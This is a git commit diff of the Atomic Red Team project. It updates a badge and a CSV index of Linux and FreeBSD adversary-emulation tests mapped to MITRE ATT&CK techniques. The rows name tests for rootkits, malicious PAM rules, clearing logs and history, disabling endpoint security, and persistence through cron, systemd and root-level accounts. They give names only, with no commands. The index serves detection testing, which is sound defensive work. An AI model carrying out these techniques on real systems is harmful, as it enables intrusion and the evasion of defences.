Merge branch 'master' into master
This commit is contained in:
Hare Sudhan
@@ -16,7 +16,7 @@
|
||||
|
||||
# Atomic Red Team
|
||||
|
||||
  
|
||||
  
|
||||
|
||||
|
||||
|
||||
|
||||
File diff suppressed because one or more lines are too long
@@ -1,5 +1,6 @@
|
||||
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
|
||||
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
|
||||
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
|
||||
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
|
||||
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,sh
|
||||
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,sh
|
||||
@@ -10,33 +11,54 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
|
||||
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,sh
|
||||
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
|
||||
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
|
||||
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",10,chflags - Remove immutable file attribute,60eee3ea-2ebd-453b-a666-c52ce08d2709,sh
|
||||
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",11,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
|
||||
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",12,Chmod through c script (freebsd),da40b5fe-3098-4b3b-a410-ff177e49ee2e,sh
|
||||
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
|
||||
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
|
||||
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
|
||||
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
|
||||
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
|
||||
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
|
||||
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
|
||||
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
|
||||
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
|
||||
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
|
||||
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
|
||||
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
|
||||
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
|
||||
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
|
||||
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
|
||||
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
|
||||
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",2,rm -rf,bd8ccc45-d632-481e-b7cf-c467627d68f9,sh
|
||||
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",5,Truncate system log files via truncate utility (freebsd),14033063-ee04-4eaf-8f5d-ba07ca7a097c,sh
|
||||
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",7,Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd),369878c6-fb04-48d6-8fc2-da9d97b3e054,sh
|
||||
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",10,Overwrite FreeBSD system log via echo utility,11cb8ee1-97fb-4960-8587-69b8388ee9d9,sh
|
||||
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",13,Delete system log files via unlink utility (freebsd),45ad4abd-19bd-4c5f-a687-41f3eee8d8c2,sh
|
||||
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",18,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
|
||||
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",19,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
|
||||
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",20,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
|
||||
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Base64 decoding with shell utilities (freebsd),b6097712-c42e-4174-b8f2-4b1e1a5bbb3d,sh
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,FreeBSD b64encode Shebang in CLI,18ee2002-66e8-4518-87c5-c0ec9c8299ac,sh
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
|
||||
@@ -49,9 +71,11 @@ defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's mo
|
||||
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
|
||||
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
|
||||
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
|
||||
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start Packet Filter,0ca82ed1-0a94-4774-9a9a-a2c83a8022b7,sh
|
||||
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
|
||||
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
|
||||
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
|
||||
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Add and delete Packet Filter rules,8b23cae1-66c1-41c5-b79d-e095b6098b5b,sh
|
||||
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
|
||||
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
|
||||
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
|
||||
@@ -64,23 +88,32 @@ defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad
|
||||
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
|
||||
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,10,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
|
||||
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
|
||||
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Auditing Configuration Changes on FreeBSD Host,cedaf7e7-28ee-42ab-ba13-456abd35d1bd,sh
|
||||
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
|
||||
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configuration Changes on FreeBSD Host,6b8ca3ab-5980-4321-80c3-bcd77c8daed8,sh
|
||||
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable syslog (freebsd),db9de996-441e-4ae0-947b-61b6871e2fdf,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
|
||||
@@ -91,8 +124,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagg
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
|
||||
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
|
||||
defense-evasion,T1027,Obfuscated Files or Information,2,Decode base64 Data into Script,197ed693-08e6-4958-bfd8-5974e291be6c,sh
|
||||
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
|
||||
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
|
||||
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on FreeBSD,f4568003-1438-44ab-a234-b3252ea7e7a3,sh
|
||||
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
|
||||
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,sh
|
||||
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,sh
|
||||
@@ -101,27 +136,38 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a si
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh
|
||||
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
|
||||
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
|
||||
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
|
||||
defense-evasion,T1036.006,Masquerading: Space after Filename,3,Space After Filename (FreeBSD),cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8,sh
|
||||
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
|
||||
defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
|
||||
defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
|
||||
defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
|
||||
defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
|
||||
defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
|
||||
defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
|
||||
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
|
||||
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
|
||||
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
|
||||
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
|
||||
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
|
||||
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
|
||||
persistence,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
|
||||
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
|
||||
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
|
||||
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
|
||||
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
|
||||
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
|
||||
persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
|
||||
persistence,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
|
||||
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
|
||||
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
|
||||
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
|
||||
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a FreeBSD system,a39ee1bc-b8c1-4331-8e5f-1859eb408518,sh
|
||||
persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
|
||||
persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
|
||||
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh
|
||||
persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
|
||||
persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
|
||||
@@ -131,20 +177,29 @@ persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level t
|
||||
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
|
||||
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
|
||||
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
|
||||
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,4,rc.local (FreeBSD),2015fb48-8ab6-4fbf-928b-0b62de5c9476,sh
|
||||
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
|
||||
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
|
||||
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
|
||||
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
|
||||
persistence,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
|
||||
persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
|
||||
persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
|
||||
persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
|
||||
persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
|
||||
persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
|
||||
